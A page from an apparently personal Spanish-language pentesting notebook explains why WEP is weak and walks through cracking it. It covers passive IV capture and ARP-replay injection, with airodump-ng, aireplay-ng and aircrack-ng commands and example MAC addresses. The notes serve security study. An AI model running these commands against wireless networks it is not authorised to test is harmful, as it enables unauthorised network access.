CyberSec Notes
  • Bienvenida
    • CyberSec Notes
  • Network Services
    • Port 21 - FTP
    • Port 22 - SSH
    • Port 23 - Telnet
    • Port 25 - SMTP
    • Port 53 - DNS
      • Deploy DNS Server with BIND
    • Port 80/443 - HTTP/HTTPS
      • Wordpress
      • CMS Made Simple (CMSMS)
    • Port 88 - Kerberos
    • Port 386, 636, 3268, 3269 - LDAP
    • Port 445 - SMB
    • Port 1521,1522-1529 - Oracle TNS Listener
    • Port 3128 - Squid
    • Port 5985, 5986 - WinRM
  • Command && Control
    • Sliver C2 [in progress]
  • Ataques en Entornos Windows
    • MalDev
      • AV Evasion
        • Function call obfuscation
      • Code Samples
        • Shellcode Execution C#
        • Shellcode Execution C++
        • Stager HTTP C#
        • Stager HTTP C++
        • Process Inyection C++
        • Process Inyection C#
        • XOR Encrypt C++
    • Directorio Activo
      • Spriying
      • Autenticacion Net-NTLMv2 y tipos de hashes
        • Pass the Hash
        • SMB Relay
      • Autenticación Kerberos
        • Extensiones del protocolo Kerberos (SPNs & PACs)
        • AS_REP Roasting
        • Kerberoasting
        • Silver Ticket Attack
        • Golden Ticket Attack
      • DCSync
      • Mimikatz
      • BloodHound
      • Privilege Escalation
        • PS Credentials in XML format
      • Utils
    • Amsi Bypass
    • Buffer Overflow
      • Stack Based 32 bits [in progress]
        • Windows SLMail 5.5
  • Ataques en Entornos Linux
    • Privilege escalation [in progress]
    • MalDev
      • Simple Reverse Shell
    • Buffer Over Flow
      • Stack Based 32 bits
        • Linux, Vulnerable functions in C programs
    • Persistencia
  • General
    • Host Discovery
    • Reverse Shells Cheet Sheet
    • Pivoting
      • Chisel
      • Port Forwarding
      • Nmap con pivoting
    • Google Dorks [in progress]
    • Denial of Service (DoS)
      • Low and Slow
    • Docker
  • Pentesting Web
    • XML External Entity Injection(XXE)
      • Portswigger Lab #1: Retrieve Files
      • Portswigger Lab #2: Perform SSRF
      • Portswigger Lab #6: Blind XXE to retrieve data via error messages
    • Open Redirect
    • LFI
      • Log Poisoning (Apache, SSH y SMPT)
  • Wireless Pentesting
    • Pre Connection Attacks
      • WEP
      • WPA/WPA2
    • Post Connection Attacks
      • ARP Spoof
    • Fake AP for Captive Portal
Powered by GitBook
On this page
  • Cómo funciona
  • Explotación
  • Método 1: Red con mucho tráfico
  • Método 2: ARP Replay
  1. Wireless Pentesting
  2. Pre Connection Attacks

WEP

PreviousPre Connection AttacksNextWPA/WPA2

Last updated 2 years ago

Cómo funciona

Wired Equivalent Privacy (WEP) es un protocolo hoy en día obsoleto para conectar de manera inalámbrica dispositivos en una red lan. Funciona de la siguiente manera:

  1. Un cliente quiere enviar un paquete de manera segura en la red, por lo que en conjunto con la clave de la red inalámbrica y un vector de inicialización IV, encriptará el contenido del mensaje.

  2. El mensaje es enviado a través de la red junto con el IV en texto plano.

  3. El receptor como ya tiene la contraseña, y ahora recibió el IV, podrá desencriptar los mensajes que le lleguen.

Explotación

La forma de crackear WEP consta de dos pasos:

  1. Capturar muchos paquetes con sus respectivos IV's.

  2. Ya que solo al tener una longitud de 24bits los IV's se repetirán en algún momento, esto nos permitira crackear la contraseña.

Método 1: Red con mucho tráfico

Este método se basa en la captura pasiva de paquetes para extraer su IV's, por lo que es clave que la red se esté utilizando, de lo contrario no se podrán conseguir los IV's necesarios para obtener la contraseña.

Captura de los IV's:

airodump-ng --bssid <bssid> --channel <n> --write <outfile> wlxd0374534e4d2
airodump-ng --bssid 5C:E2:8C:55:88:B8 --channel 6 --write wep_network wlxd0374534e4d2

Crackeo de la contraseña:

aircrack-ng <captura>.cap

Método 2: ARP Replay

Este ataque viene a solucionar el problema del ataque anterior, si no tráfico en la red, no se generarán los suficientes IV's para crackearlos. Por lo que entra en juego el protocolo ARP para llevar a cabo este ataque, en el que se intercepta un paquete ARP legítimo de la red, solo que se modifica la dirección MAC de destino.

Pasos a seguir:

  1. Se envía un paquete ARP al router víctima

  2. El router lo captura y retransmite

  3. Estos paquetes están encriptados, por lo que son generados nuevos IV's

  4. Con los IV's suficientes se puede obtener la contraseña

Captura de los IV's:

airodump-ng --bssid <bssid> --channel <n> --write <outfile> wlxd0374534e4d2
airodump-ng --bssid 5C:E2:8C:55:88:B8 --channel 6 --write wep_network wlxd0374534e4d2

Asociar un cliente a la red:

aireplay-ng --fakeauth 0 -a <bssid> -h <mac-monitor> <name-iface>
aireplay-ng --fakeauth 0 -a 5C:E2:8C:55:88:B8 -h 16:B4:A3:E9:C1:A1 wlxd0374534e4d2

Generar paquetes ARP:

aireplay-ng --arpreplay -b <bssid> -h <mac-monitor> <name-iface>
aireplay-ng --arpreplay -b 5C:E2:8C:55:88:B8 -h 16:B4:A3:E9:C1:A1 wlxd0374534e4d2

Crackear IV's:

aircrack-ng <captura>.cap